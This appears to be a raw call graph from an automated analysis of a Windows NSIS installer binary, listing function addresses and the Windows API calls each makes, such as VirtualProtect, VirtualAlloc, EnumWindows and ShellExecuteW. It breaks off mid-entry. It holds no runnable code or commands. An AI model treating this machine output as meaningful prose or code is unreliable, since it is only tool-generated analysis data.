5078->5079 5080 40166e 5079->5080 5081 402b3a 18 API calls 5080->5081 5082 401677 MoveFileW 5081->5082 5083 401683 5082->5083 5084 40168a 5082->5084 5086 401423 25 API calls 5083->5086 5085 40628b 2 API calls 5084->5085 5088 402197 5084->5088 5087 401699 5085->5087 5086->5088 5087->5088 5089 405de2 40 API calls 5087->5089 5089->5083 3935 4023e0 3946 402c44 3935->3946 3937 4023ea 3950 402b3a 3937->3950 3940 4023fe RegQueryValueExW 3941 40241e 3940->3941 3942 402424 RegCloseKey 3940->3942 3941->3942 3956 405e8f wsprintfW 3941->3956 3943 402793 3942->3943 3947 402b3a 18 API calls 3946->3947 3948 402c5d 3947->3948 3949 402c6b RegOpenKeyExW 3948->3949 3949->3937 3951 402b46 3950->3951 3957 405f6a 3951->3957 3953 4023f3 3953->3940 3953->3943 3956->3942 3972 405f77 3957->3972 3958 4061c2 3959 402b67 3958->3959 3991 405f48 lstrcpynW 3958->3991 3959->3953 3975 4061dc 3959->3975 3961 40602a GetVersion 3961->3972 3962 406190 lstrlenW 3962->3972 3963 405f6a 10 API calls 3963->3962 3966 4060a5 GetSystemDirectoryW 3966->3972 3968 4060b8 GetWindowsDirectoryW 3968->3972 3969 4061dc 5 API calls 3969->3972 3970 405f6a 10 API calls 3970->3972 3971 406131 lstrcatW 3971->3972 3972->3958 3972->3961 3972->3962 3972->3963 3972->3966 3972->3968 3972->3969 3972->3970 3972->3971 3973 4060ec SHGetSpecialFolderLocation 3972->3973 3984 405e15 RegOpenKeyExW 3972->3984 3989 405e8f wsprintfW 3972->3989 3990 405f48 lstrcpynW 3972->3990 3973->3972 3974 406104 SHGetPathFromIDListW CoTaskMemFree 3973->3974 3974->3972 3976 4061e9 3975->3976 3978 40625f 3976->3978 3979 406252 CharNextW 3976->3979 3982 40623e CharNextW 3976->3982 3983 40624d CharNextW 3976->3983 3992 4059c0 3976->3992 3977 406264 CharPrevW 3977->3978 3978->3977 3980 406285 3978->3980 3979->3976 3979->3978 3980->3953 3982->3976 3983->3979 3985 405e89 3984->3985 3986 405e49 RegQueryValueExW 3984->3986 3985->3972 3987 405e6a RegCloseKey 3986->3987 3987->3985 3989->3972 3990->3972 3991->3959 3993 4059c6 3992->3993 3994 4059dc 3993->3994 3995 4059cd CharNextW 3993->3995 3994->3976 3995->3993 5090 401ce5 GetDlgItem GetClientRect 5091 402b3a 18 API calls 5090->5091 5092 401d17 LoadImageW SendMessageW 5091->5092 5093 401d35 DeleteObject 5092->5093 5094 4029c7 5092->5094 5093->5094 5095 4027e5 5115 405bb4 GetFileAttributesW CreateFileW 5095->5115 5097 4027ec 5098 402895 5097->5098 5099 4027f8 GlobalAlloc 5097->5099 5100 4028b0 5098->5100 5101 40289d DeleteFileW 5098->5101 5102 402811 5099->5102 5103 40288c CloseHandle 5099->5103 5101->5100 5116 40330f SetFilePointer 5102->5116 5103->5098 5105 402817 5106 4032f9 ReadFile 5105->5106 5107 402820 GlobalAlloc 5106->5107 5108 402830 5107->5108 5109 402864 WriteFile GlobalFree 5107->5109 5110 403062 46 API calls 5108->5110 5111 403062 46 API calls 5109->5111 5114 40283d 5110->5114 5112 402889 5111->5112 5112->5103 5113 40285b GlobalFree 5113->5109 5114->5113 5115->5097 5116->5105 5117 405166 5118 405176 5117->5118 5119 40518a 5117->5119 5120 4051d3 5118->5120 5121 40517c 5118->5121 5122 405192 IsWindowVisible 5119->5122 5128 4051a9 5119->5128 5123 4051d8 CallWindowProcW 5120->5123 5124 4041e6 SendMessageW 5121->5124 5122->5120 5125 40519f 5122->5125 5127 405186 5123->5127 5124->5127 5130 404abc SendMessageW 5125->5130 5128->5123 5135 404b3c 5128->5135 5131 404b1b SendMessageW 5130->5131 5132 404adf GetMessagePos ScreenToClient SendMessageW 5130->5132 5134 404b13 5131->5134 5133 404b18 5132->5133 5132->5134 5133->5131 5134->5128 5144 405f48 lstrcpynW 5135->5144 5137 404b4f 5145 405e8f wsprintfW 5137->5145 5139 404b59 5140 40140b 2 API calls 5139->5140 5141 404b62 5140->5141 5146 405f48 lstrcpynW 5141->5146 5143 404b69 5143->5120 5144->5137 5145->5139 5146->5143 5147 4042e8 lstrlenW 5148 404307 5147->5148 5149 404309 WideCharToMultiByte 5147->5149 5148->5149 5150 100018a9 5152 100018cc 5150->5152 5151 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5154 10001272 2 API calls 5151->5154 5152->5151 5153 100018ff GlobalFree 5152->5153 5153->5151 5155 10001a87 GlobalFree GlobalFree 5154->5155 4256 40206a 4257 402b3a 18 API calls 4256->4257 4258 402071 4257->4258 4259 402b3a 18 API calls 4258->4259 4260 40207b 4259->4260 4261 402b3a 18 API calls 4260->4261 4262 402084 4261->4262 4263 402b3a 18 API calls 4262->4263 4264 40208e 4263->4264 4265 402b3a 18 API calls 4264->4265 4266 402098 4265->4266 4267 4020ac CoCreateInstance 4266->4267 4268 402b3a 18 API calls 4266->4268 4271 4020cb 4267->4271 4268->4267 4270 402197 4271->4270 4272 401423 4271->4272 4273 4051f2 25 API calls 4272->4273 4274 401431 4273->4274 4274->4270 5163 40156b 5164 401584 5163->5164 5165 40157b ShowWindow 5163->5165 5166 401592 ShowWindow 5164->5166 5167 4029c7 5164->5167 5165->5164 5166->5167 5168 404b6e GetDlgItem GetDlgItem 5169 404bc0 7 API calls 5168->5169 5177 404dd9 5168->5177 5170 404c63 DeleteObject 5169->5170 5171 404c56 SendMessageW 5169->5171 5172 404c6c 5170->5172 5171->5170 5174 404ca3 5172->5174 5176 405f6a 18 API calls 5172->5176 5173 404ebd 5175 404f69 5173->5175 5184 404f16 SendMessageW 5173->5184 5210 404dcc 5173->5210 5178 40419a 19 API calls 5174->5178 5179 404f73 SendMessageW 5175->5179 5180 404f7b 5175->5180 5181 404c85 SendMessageW SendMessageW 5176->5181 5177->5173 5188 404abc 5 API calls 5177->5188 5211 404e4a 5177->5211 5182 404cb7 5178->5182 5179->5180 5187 404fa4 5180->5187 5193 404f94 5180->5193 5194 404f8d ImageList_Destroy 5180->5194 5181->5172 5183 40419a 19 API calls 5182->5183 5189 404cc5 5183->5189 5191 404f2b SendMessageW 5184->5191 5184->5210 5185 404201 8 API calls 5192 40515f 5185->5192 5186 404eaf SendMessageW 5186->5173 5190 405113 5187->5190 5209 404b3c 4 API calls 5187->5209 5215 404fdf 5187->5215 5188->5211 5196 404d9a GetWindowLongW SetWindowLongW 5189->5196 5203 404d15 SendMessageW 5189->5203 5205 404d94 5189->5205 5207 404d51 SendMessageW 5189->5207 5208 404d62 SendMessageW 5189->5208 5197 405125 ShowWindow GetDlgItem ShowWindow 5190->5197 5190->5210 5199 404f3e 5191->5199 5193->5187 5195 404f9d GlobalFree 5193->5195 5194->5193 5195->5187 5198 404db3 5196->5198 5197->5210 5200 404dd1 5198->5200 5201 404db9 ShowWindow 5198->5201 5204 404f4f SendMessageW 5199->5204 5220 4041cf SendMessageW 5200->5220 5219 4041cf SendMessageW 5201->5219 5203->5189 5204->5175 5205->5196 5205->5198 5207->5189 5208->5189 5209->5215 5210->5185 5211->5173 5211->5186 5212 4050e9 InvalidateRect 5212->5190 5213 4050ff 5212->5213 5221 4049d6 5213->5221 5214 40500d SendMessageW 5218 405023 5214->5218 5215->5214 5215->5218 5217 405097 SendMessageW SendMessageW 5217->5218 5218->5212 5218->5217 5219->5210 5220->5177 5222 4049f3 5221->5222 5223 405f6a 18 API calls 5222->5223 5224 404a28 5223->5224 5225 405f6a 18 API calls 5224->5225 5226 404a33 5225->5226 5227 405f6a 18 API calls 5226->5227 5228 404a64 lstrlenW wsprintfW SetDlgItemTextW 5227->5228 5228->5190 5229 4024ee 5230 4024f3 5229->5230 5231 40250c 5229->5231 5232 402b1d 18 API calls 5230->5232 5233 402512 5231->5233 5234 40253e 5231->5234 5239 4024fa 5232->5239 5235 402b3a 18 API calls 5233->5235 5236 402b3a 18 API calls 5234->5236 5237 402519 WideCharToMultiByte lstrlenA 5235->5237 5238 402545 lstrlenW 5236->5238 5237->5239 5238->5239 5240 402567 WriteFile 5239->5240 5241 402793 5239->5241 5240->5241 5242 4045ee 5243 404624 5242->5243 5244 4045fe 5242->5244 5245 404201 8 API calls 5243->5245 5246 40419a 19 API calls 5244->5246 5248 404630 5245->5248 5247 40460b SetDlgItemTextW 5246->5247 5247->5243 5249 4018ef 5250 401926 5249->5250 5251 402b3a 18 API calls 5250->5251 5252 40192b 5251->5252 5253 4057d0 71 API calls 5252->5253 5254 401934 5253->5254 5255 404970 5256 404980 5255->5256 5257 40499c 5255->5257 5266 405708 GetDlgItemTextW 5256->5266 5259 4049a2 SHGetPathFromIDListW 5257->5259 5260 4049cf 5257->5260 5262 4049b2 5259->5262 5265 4049b9 SendMessageW 5259->5265 5261 40498d SendMessageW 5261->5257 5263 40140b 2 API calls 5262->5263 5263->5265 5265->5260 5266->5261 5267 402770 5268 402b3a 18 API calls 5267->5268 5269 402777 FindFirstFileW 5268->5269 5270 40278a 5269->5270 5271 40279f 5269->5271 5272 4027a8 5271->5272 5275 405e8f wsprintfW 5271->5275 5276 405f48 lstrcpynW 5272->5276 5275->5272 5276->5270 5277 4014f1 SetForegroundWindow 5278 4029c7 5277->5278 5279 4018f2 5280 402b3a 18 API calls 5279->5280 5281 4018f9 5280->5281 5282 405724 MessageBoxIndirectW 5281->5282 5283 401902 5282->5283 4451 402573 4452 402b1d 18 API calls 4451->4452 4458 402582 4452->4458 4453 4026a0 4454 4025c8 ReadFile 4454->4453 4454->4458 4455 405c37 ReadFile 4455->4458 4456 4026a2 4463 405e8f wsprintfW 4456->4463 4457 402608 MultiByteToWideChar 4457->4458 4458->4453 4458->4454 4458->4455 4458->4456 4458->4457 4460 40262e SetFilePointer MultiByteToWideChar 4458->4460 4461 4026b3 4458->4461 4460->4458 4461->4453 4462 4026d4 SetFilePointer 4461->4462 4462->4453 4463->4453 5284 401df3 5285 402b3a 18 API calls 5284->5285 5286 401df9 5285->5286 5287 402b3a 18 API calls 5286->5287 5288 401e02 5287->5288 5289 402b3a 18 API calls 5288->5289 5290 401e0b 5289->5290 5291 402b3a 18 API calls 5290->5291 5292 401e14 5291->5292 5293 401423 25 API calls 5292->5293 5294 401e1b ShellExecuteW 5293->5294 5295 401e4c 5294->5295 5301 100016b6 5302 100016e5 5301->5302 5303 10001b18 22 API calls 5302->5303 5304 100016ec 5303->5304 5305 100016f3 5304->5305 5306 100016ff 5304->5306 5307 10001272 2 API calls 5305->5307 5308 10001726 5306->5308 5309 10001709 5306->5309 5312 100016fd 5307->5312 5310 10001750 5308->5310 5311 1000172c 5308->5311 5313 1000153d 3 API calls 5309->5313 5315 1000153d 3 API calls 5310->5315 5314 100015b4 3 API calls 5311->5314 5316 1000170e 5313->5316 5317 10001731 5314->5317 5315->5312 5318 100015b4 3 API calls 5316->5318 5320 10001272 2 API calls 5317->5320 5319 10001714 5318->5319 5321 10001272 2 API calls 5319->5321 5322 10001737 GlobalFree 5320->5322 5323 1000171a GlobalFree 5321->5323 5322->5312 5324 1000174b GlobalFree 5322->5324 5323->5312 5324->5312 5325 10002238 5326 10002296 5325->5326 5327 100022cc 5325->5327 5326->5327 5328 100022a8 GlobalAlloc 5326->5328 5328->5326 4682 4026f9 4683 402700 4682->4683 4686 402972 4682->4686 4684 402b1d 18 API calls 4683->4684 4685 40270b 4684->4685 4687 402712 SetFilePointer 4685->4687 4687->4686 4688 402722 4687->4688 4690 405e8f wsprintfW 4688->4690 4690->4686 5329 1000103d 5332 1000101b 5329->5332 5339 10001516 5332->5339 5334 10001020 5335 10001024 5334->5335 5336 10001027 GlobalAlloc 5334->5336 5337 1000153d 3 API calls 5335->5337 5336->5335 5338 1000103b 5337->5338 5341 1000151c 5339->5341 5340 10001522 5340->5334 5341->5340 5342 1000152e GlobalFree 5341->5342 5342->5334 5343 402c7f 5344 402c91 SetTimer 5343->5344 5345 402caa 5343->5345 5344->5345 5346 402cf8 5345->5346 5347 402cfe MulDiv 5345->5347 5348 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5347->5348 5348->5346 5350 4014ff 5351 401507 5350->5351 5353 40151a 5350->5353 5352 402b1d 18 API calls 5351->5352 5352->5353 5354 401000 5355 401037 BeginPaint GetClientRect 5354->5355 5358 40100c DefWindowProcW 5354->5358 5356 4010f3 5355->5356 5360 401073 CreateBrushIndirect FillRect DeleteObject 5356->5360 5361 4010fc 5356->5361 5359 401179 5358->5359 5360->5356 5362 401102 CreateFontIndirectW 5361->5362 5363 401167 EndPaint 5361->5363 5362->5363 5364 401112 6 API calls 5362->5364 5363->5359 5364->5363 5365 401a00 5366 402b3a 18 API calls 5365->5366 5367 401a09 ExpandEnvironmentStringsW 5366->5367 5368 401a1d 5367->5368 5370 401a30 5367->5370 5369 401a22 lstrcmpW 5368->5369 5368->5370 5369->5370 5371 401b01 5372 402b3a 18 API calls 5371->5372 5373 401b08 5372->5373 5374 402b1d 18 API calls 5373->5374 5375 401b11 wsprintfW 5374->5375 5376 4029c7 5375->5376 4253 100027c7 4254 10002817 4253->4254 4255 100027d7 VirtualProtect 4253->4255 4255->4254 5384 401f08 5385 402b3a 18 API calls 5384->5385 5386 401f0f GetFileVersionInfoSizeW 5385->5386 5387 401f36 GlobalAlloc 5386->5387 5388 401f8c 5386->5388 5387->5388 5389 401f4a GetFileVersionInfoW 5387->5389 5389->5388 5390 401f59 VerQueryValueW 5389->5390 5390->5388 5391 401f72 5390->5391 5395 405e8f wsprintfW 5391->5395 5393 401f7e 5396 405e8f wsprintfW 5393->5396 5395->5393 5396->5388 5397 401c8e 5398 402b1d 18 API calls 5397->5398 5399 401c94 IsWindow 5398->5399 5400 4019f0 5399->5400 5401 1000164f 5402 10001516 GlobalFree 5401->5402 5404 10001667 5402->5404 5403 100016ad GlobalFree 5404->5403 5405 10001682 5404->5405 5406 10001699 VirtualFree 5404->5406 5405->5403 5406->5403 5414 401491 5415 4051f2 25 API calls 5414->5415 5416 401498 5415->5416 4487 402295 4488 402b3a 18 API calls 4487->4488 4489 4022a4 4488->4489 4490 402b3a 18 API calls 4489->4490 4491 4022ad 4490->4491 4492 402b3a 18 API calls 4491->4492 4493 4022b7 GetPrivateProfileStringW 4492->4493 4499 401f98 4500 40205c 4499->4500 4501 401faa 4499->4501 4504 401423 25 API calls 4500->4504 4502 402b3a 18 API calls 4501->4502 4503 401fb1 4502->4503 4505 402b3a 18 API calls 4503->4505 4509 402197 4504->4509 4506 401fba 4505->4506 4507 401fd0 LoadLibraryExW 4506->4507 4508 401fc2 GetModuleHandleW 4506->4508 4507->4500 4510 401fe1 4507->4510 4508->4507 4508->4510 4522 40631e WideCharToMultiByte 4510->4522 4513 401ff2 4515 402011 4513->4515 4516 401ffa 4513->4516 4514 40202b 4517 4051f2 25 API calls 4514->4517 4525 10001759 4515->4525 4518 401423 25 API calls 4516->4518 4519 402002 4517->4519 4518->4519 4519->4509 4520 40204e FreeLibrary 4519->4520 4520->4509 4523 406348 GetProcAddress 4522->4523 4524 401fec 4522->4524 4523->4524 4524->4513 4524->4514 4526 10001789 4525->4526 4567 10001b18 4526->4567 4528 10001790 4529 100018a6 4528->4529 4530 100017a1 4528->4530 4531 100017a8 4528->4531 4529->4519 4616 10002286 4530->4616 4599 100022d0 4531->4599 4536 1000180c 4540 10001812 4536->4540 4541 1000184e 4536->4541 4537 100017ee 4629 100024a9 4537->4629 4538 100017d7 4552 100017cd 4538->4552 4626 10002b5f 4538->4626 4539 100017be 4547 100017c4 4539->4547 4548 100017cf 4539->4548 4543 100015b4 3 API calls 4540->4543 4545 100024a9 10 API calls 4541->4545 4551 10001828 4543->4551 4553 10001840 4545->4553 4546 100017f4 4640 100015b4 4546->4640 4547->4552 4610 100028a4 4547->4610 4620 10002645 4548->4620 4556 100024a9 10 API calls 4551->4556 4552->4536 4552->4537 4558 10001895 4553->4558 4651 1000246c 4553->4651 4555 100017d5 4555->4552 4556->4553 4558->4529 4560 1000189f GlobalFree 4558->4560 4560->4529 4564 10001881 4564->4558 4655 1000153d wsprintfW 4564->4655 4566 1000187a FreeLibrary 4566->4564 4658 1000121b GlobalAlloc 4567->4658 4569 10001b3c 4659 1000121b GlobalAlloc 4569->4659 4571 10001d7a GlobalFree GlobalFree GlobalFree 4572 10001d97 4571->4572 4583 10001de1 4571->4583 4574 100020ee 4572->4574 4582 10001dac 4572->4582 4572->4583 4573 10001b47 4573->4571 4575 10001c1d GlobalAlloc 4573->4575 4577 10001c86 GlobalFree 4573->4577 4580 10001c68 lstrcpyW 4573->4580 4573->4583 4584 10001c72 lstrcpyW 4573->4584 4588 10002048 4573->4588 4592 10001f37 GlobalFree 4573->4592 4596 1000122c 2 API calls 4573->4596 4597 10001cc4 4573->4597 4665 1000121b GlobalAlloc 4573->4665 4576 10002110 GetModuleHandleW 4574->4576 4574->4583 4575->4573 4578 10002121 LoadLibraryW 4576->4578 4579 10002136 4576->4579 4577->4573 4578->4579 4578->4583 4666 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4579->4666 4580->4584 4582->4583 4662 1000122c 4582->4662 4583->4528 4584->4573 4585 10002188 4585->4583 4586 10002195 lstrlenW 4585->4586 4667 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4586->4667 4588->4583 4591 10002090 lstrcpyW 4588->4591 4591->4583 4592->4573 4593 10002148 4593->4585 4598 10002172 GetProcAddress 4593->4598 4594 100021af 4594->4583 4596->4573 4597->4573 4660 1000158f GlobalSize GlobalAlloc 4597->4660 4598->4585 4600 100022e8 4599->4600 4602 10002415 GlobalFree 4600->4602 4604 100023d3 lstrlenW 4600->4604 4605 100023ba GlobalAlloc CLSIDFromString 4600->4605 4606 1000238f GlobalAlloc WideCharToMultiByte 4600->4606 4607 1000122c GlobalAlloc lstrcpynW 4600->4607 4669 100012ba 4600->4669 4602->4600 4603 100017ae 4602->4603 4603->4538 4603->4539 4603->4552 4604->4602 4609 100023de 4604->4609 4605->4602 4606->4602 4607->4600 4609->4602 4673 100025d9 4609->4673 4612 100028b6 4610->4612 4611 1000295b EnumWindows 4613 10002979 4611->4613 4612->4611 4614 10002a75 4613->4614 4615 10002a6a GetLastError 4613->4615 4614->4552 4615->4614 4617 10002296 4616->4617 4618 100017a7 4616->4618 4617->4618 4619 100022a8 GlobalAlloc 4617->4619 4618->4531 4619->4617 4624 10002661 4620->4624 4621 100026b2 GlobalAlloc 4625 100026d4 4621->4625 4622 100026c5 4623 100026ca GlobalSize 4622->4623 4622->4625 4623->4625 4624->4621 4624->4622 4625->4555 4627 10002b6a 4626->4627 4628 10002baa GlobalFree 4627->4628 4676 1000121b GlobalAlloc 4629->4676 4631 100024b3 4632 10002530 StringFromGUID2 4631->4632 4633 10002541 lstrcpynW 4631->4633 4634 1000250b MultiByteToWideChar 4631->4634 4635 10002554 wsprintfW 4631->4635 4636 10002571 GlobalFree 4631->4636 4637 100025ac GlobalFree 4631->4637 4638 10001272 2 API calls 4631->4638 4677 100012e1 4631->4677 4632->4631 4633->4631 4634->4631 4635->4631 4636->4631 4637->4546 4638->4631 4681 1000121b GlobalAlloc 4640->4681 4642 100015ba 4643 100015c7 lstrcpyW 4642->4643 4645 100015e1 4642->4645 4647 100015fb 4643->4647 4646 100015e6 wsprintfW 4645->4646 4645->4647 4646->4647 4648 10001272 4647->4648 4649 100012b5 GlobalFree 4648->4649 4650 1000127b GlobalAlloc lstrcpynW 4648->4650 4649->4553 4650->4649 4652 10001861 4651->4652 4653 1000247a 4651->4653 4652->4564 4652->4566 4653->4652 4654 10002496 GlobalFree 4653->4654 4654->4653 4656 10001272 2 API calls 4655->4656 4657 1000155e 4656->4657 4657->4558 4658->4569 4659->4573 4661 100015ad 4660->4661 4661->4597 4668 1000121b GlobalAlloc 4662->4668 4664 1000123b lstrcpynW 4664->4583 4665->4573 4666->4593 4667->4594 4668->4664 4670 100012c1 4669->4670 4671 1000122c 2 API calls 4670->4671 4672 100012df 4671->4672 4672->4600 4674 100025e7 VirtualAlloc 4673->4674 4675 1000263d 4673->4675 4674->4675 4675->4609 4676->4631 4678 100012ea 4677->4678 4679 1000130c 4677->4679 4678->4679 4680 100012f0 lstrcpyW 4678->4680 4679->4631 4680->4679 4681->4642 5417 10001058 5419 10001074 5417->5419 5418 100010dd 5419->5418 5420 10001092 5419->5420 5421 10001516 GlobalFree 5419->5421 5422 10001516 GlobalFree 5420->5422 5421->5420 5423 100010a2 5422->5423 5424 100010b2 5423->5424 5425 100010a9 GlobalSize 5423->5425 5426 100010b6 GlobalAlloc 5424->5426 5428 100010c7 5424->5428 5425->5424 5427 1000153d 3 API calls 5426->5427 5427->5428 5429 100010d2 GlobalFree 5428->5429 5429->5418 5430 401718 5431 402b3a 18 API calls 5430->5431 5432 40171f SearchPathW 5431->5432 5433 40173a 5432->5433 4921 40159b 4922 402b3a 18 API calls 4921->4922 4923 4015a2 SetFileAttributesW 4922->4923 4924 4015b4 4923->4924 5434 40659d 5438 406421 5434->5438 5435 406d8c 5436 4064a2 GlobalFree 5437 4064ab GlobalAlloc 5436->5437 5437->5435 5437->5438 5438->5435 5438->5436 5438->5437 5438->5438 5439 406522 GlobalAlloc 5438->5439 5440 406519 GlobalFree 5438->5440 5439->5435 5439->5438 5440->5439 5441 40149e 5442 4014ac PostQuitMessage 5441->5442 5443 40223e 5441->5443 5442->5443 5444 4021a0 5445 402b3a 18 API calls 5444->5445 5446 4021a6 5445->5446 5447 402b3a 18 API calls 5446->5447 5448 4021af 5447->5448 5449 402b3a 18 API calls 5448->5449 5450 4021b8 5449->5450 5451 40628b 2 API calls 5450->5451 5452 4021c1 5451->5452 5453 4021d2 lstrlenW lstrlenW 5452->5453 5457 4021c5 5452->5457 5455 4051f2 25 API calls 5453->5455 5454 4051f2 25 API calls 5458 4021cd 5454->5458 5456 402210 SHFileOperationW 5455->5456 5456->5457 5456->5458 5457->5454 5457->5458 5459 100010e1 5468 10001111 5459->5468 5460 100011d8 GlobalFree 5461 100012ba 2 API calls 5461->5468 5462 100011d3 5462->5460 5463 100011f8 GlobalFree 5463->5468 5464 10001272 2 API calls 5467 100011c4 GlobalFree 5464->5467 5465 10001164 GlobalAlloc 5465->5468 5466 100012e1 lstrcpyW 5466->5468 5467->5468 5468->5460 5468->5461 5468->5462 5468->5463 5468->5464 5468->5465 5468->5466 5468->5467 5469 401b22 5470 401b73 5469->5470 5471 401b2f 5469->5471 5472 401b78 5470->5472 5473 401b9d GlobalAlloc 5470->5473 5476 401b46 5471->5476 5479 401bb8 5471->5479 5485 40223e 5472->5485 5490 405f48 lstrcpynW 5472->5490 5475 405f6a 18 API calls 5473->5475 5474 405f6a 18 API calls 5477 402238 5474->5477 5475->5479 5488 405f48 lstrcpynW 5476->5488 5483 405724 MessageBoxIndirectW 5477->5483 5479->5474 5479->5485 5481 401b8a GlobalFree 5481->5485 5482 401b55 5489 405f48 lstrcpynW 5482->5489 5483->5485 5486 401b64 5491 405f48 lstrcpynW 5486->5491 5488->5482 5489->5486 5490->5481 5491->5485 5492 4029a2 SendMessageW 5493 4029c7 5492->5493 5494 4029bc InvalidateRect 5492->5494 5494->5493 4099 401924 4100 401926 4099->4100 4101 402b3a 18 API calls 4100->4101 4102 40192b 4101->4102 4105 4057d0 4102->4105 4144 405a9b 4105->4144 4108 4057f8 DeleteFileW 4110 401934 4108->4110 4109 40580f 4111 40592f 4109->4111 4158 405f48 lstrcpynW 4109->4158 4111->4110 4188 40628b FindFirstFileW 4111->4188 4113 405835 4114 405848 4113->4114 4115 40583b lstrcatW 4113->4115 4159 4059df lstrlenW 4114->4159 4116 40584e 4115->4116 4120 40585e lstrcatW 4116->4120 4122 405869 lstrlenW FindFirstFileW 4116->4122 4120->4122 4121 405958 4191 405993 lstrlenW CharPrevW 4121->4191 4122->4111 4129 40588b 4122->4129 4125 405912 FindNextFileW 4125->4129 4130 405928 FindClose 4125->4130 4126 405788 5 API calls 4128 40596a 4126->4128 4131 405984 4128->4131 4132 40596e 4128->4132 4129->4125 4143 4058d3 4129->4143 4163 405f48 lstrcpynW 4129->4163 4130->4111 4134 4051f2 25 API calls 4131->4134 4132->4110 4135 4051f2 25 API calls 4132->4135 4134->4110 4137 40597b 4135->4137 4136 4057d0 64 API calls 4136->4143 4139 405de2 40 API calls 4137->4139 4138 4051f2 25 API calls 4138->4125 4141 405982 4139->4141 4141->4110 4143->4125 4143->4136 4143->4138 4164 405788 4143->4164 4172 4051f2 4143->4172 4183 405de2 4143->4183 4194 405f48 lstrcpynW 4144->4194 4146 405aac 4195 405a3e CharNextW CharNextW 4146->4195 4149 4057f0 4149->4108 4149->4109 4150 4061dc 5 API calls 4156 405ac2 4150->4156 4151 405af3 lstrlenW 4152 405afe 4151->4152 4151->4156 4154 405993 3 API calls 4152->4154 4153 40628b 2 API calls 4153->4156 4155 405b03 GetFileAttributesW 4154->4155 4155->4149 4156->4149 4156->4151 4156->4153 4157 4059df 2 API calls 4156->4157 4157->4151 4158->4113 4160 4059ed 4159->4160 4161 4059f3 CharPrevW 4160->4161 4162 4059ff 4160->4162 4161->4160 4161->4162 4162->4116 4163->4129 4201 405b8f GetFileAttributesW 4164->4201 4167 4057b5 4167->4143 4168 4057a3 RemoveDirectoryW 4170 4057b1 4168->4170 4169 4057ab DeleteFileW 4169->4170 4170->4167 4171 4057c1 SetFileAttributesW 4170->4171 4171->4167 4173 40520d 4172->4173 4182 4052af 4172->4182 4174 405229 lstrlenW 4173->4174 4175 405f6a 18 API calls 4173->4175 4176 405252 4174->4176 4177 405237 lstrlenW 4174->4177 4175->4174 4179 405265 4176->4179 4180 405258 SetWindowTextW 4176->4180 4178 405249 lstrcatW 4177->4178 4177->4182 4178->4176 4181 40526b SendMessageW SendMessageW SendMessageW 4179->4181 4179->4182 4180->4179 4181->4182 4182->4143 4204 4062b2 GetModuleHandleA 4183->4204 4187 405e0a 4187->4143 4189 4062a1 FindClose 4188->4189 4190 405954 4188->4190 4189->4190 4190->4110 4190->4121 4192 40595e 4191->4192 4193 4059af lstrcatW 4191->4193 4192->4126 4193->4192 4194->4146 4196 405a5b 4195->4196 4199 405a6d 4195->4199 4198 405a68 CharNextW 4196->4198 4196->4199 4197 405a91 4197->4149 4197->4150 4198->4197 4199->4197 4200 4059c0 CharNextW 4199->4200 4200->4199 4202 405ba1 SetFileAttributesW 4201->4202 4203 405794 4201->4203 4202->4203 4203->4167 4203->4168 4203->4169 4205 4062d9 GetProcAddress 4204->4205 4206 4062ce LoadLibraryA 4204->4206 4207 405de9 4205->4207 4206->4205 4206->4207 4207->4187 4208 405c66 lstrcpyW 4207->4208 4209 405cb5 GetShortPathNameW 4208->4209 4210 405c8f 4208->4210 4212 405cca 4209->4212 4213 405ddc 4209->4213 4233 405bb4 GetFileAttributesW CreateFileW 4210->4233 4212->4213 4215 405cd2 wsprintfA 4212->4215 4213->4187 4214 405c99 CloseHandle GetShortPathNameW 4214->4213 4216 405cad 4214->4216 4217 405f6a 18 API calls 4215->4217 4216->4209 4216->4213 4218 405cfa 4217->4218 4234 405bb4 GetFileAttributesW CreateFileW 4218->4234 4220 405d07 4220->4213 4221 405d16 GetFileSize GlobalAlloc 4220->4221 4222 405dd5 CloseHandle 4221->4222 4223 405d38 4221->4223 4222->4213 4235 405c37 ReadFile 4223->4235 4228 405d57 lstrcpyA 4231 405d79 4228->4231 4229 405d6b 4230 405b19 4 API calls 4229->4230 4230->4231 4232 405db0 SetFilePointer WriteFile GlobalFree 4231->4232 4232->4222 4233->4214 4234->4220 4236 405c55 4235->4236 4236->4222 4237 405b19 lstrlenA 4236->4237 4238 405b5a lstrlenA 4237->4238 4239 405b62 4238->4239 4240 405b33 lstrcmpiA 4238->4240 4239->4228 4239->4229 4240->4239 4241 405b51 CharNextA 4240->4241 4241->4238 5495 402224 5496 40223e 5495->5496 5497 40222b 5495->5497 5498 405f6a 18 API calls 5497->5498 5499 402238 5498->5499 5500 405724 MessageBoxIndirectW 5499->5500 5500->5496 5508 402729 5509 402730 5508->5509 5510 4029c7 5508->5510 5511 402736 FindClose 5509->5511 5511->5510 5512 401cab 5513 402b1d 18 API calls 5512->5513 5514 401cb2 5513->5514 5515 402b1d 18 API calls 5514->5515 5516 401cba GetDlgItem 5515->5516 5517 4024e8 5516->5517 5518 4042ae lstrcpynW lstrlenW 5519 4016af 5520 402b3a 18 API calls 5519->5520 5521 4016b5 GetFullPathNameW 5520->5521 5522 4016cf 5521->5522 5523 4016f1 5521->5523 5522->5523 5526 40628b 2 API calls 5522->5526 5524 401706 GetShortPathNameW 5523->5524 5525 4029c7 5523->5525 5524->5525 5527 4016e1 5526->5527 5527->5523 5529 405f48 lstrcpynW 5527->5529 5529->5523 4278 405331 4279 405352 GetDlgItem GetDlgItem GetDlgItem 4278->4279 4280 4054dd 4278->4280 4324 4041cf SendMessageW 4279->4324 4282 4054e6 GetDlgItem CreateThread CloseHandle 4280->4282 4285 40550e 4280->4285 4282->4285 4327 4052c5 OleInitialize 4282->4327 4283 4053c3 4290 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4283->4290 4284 405539 4288 405545 4284->4288 4289 405599 4284->4289 4285->4284 4286 405525 ShowWindow ShowWindow 4285->4286 4287 40555e 4285->4287 4326 4041cf SendMessageW 4286->4326 4294 404201 8 API calls 4287->4294 4292 405573 ShowWindow 4288->4292 4293 40554d 4288->4293 4289->4287 4299 4055a7 SendMessageW 4289->4299 4297 405439 4290->4297 4298 40541d SendMessageW SendMessageW 4290->4298 4295 405593 4292->4295 4296 405585 4292->4296 4300 404173 SendMessageW 4293->4300 4301 40556c 4294->4301 4303 404173 SendMessageW 4295->4303 4302 4051f2 25 API 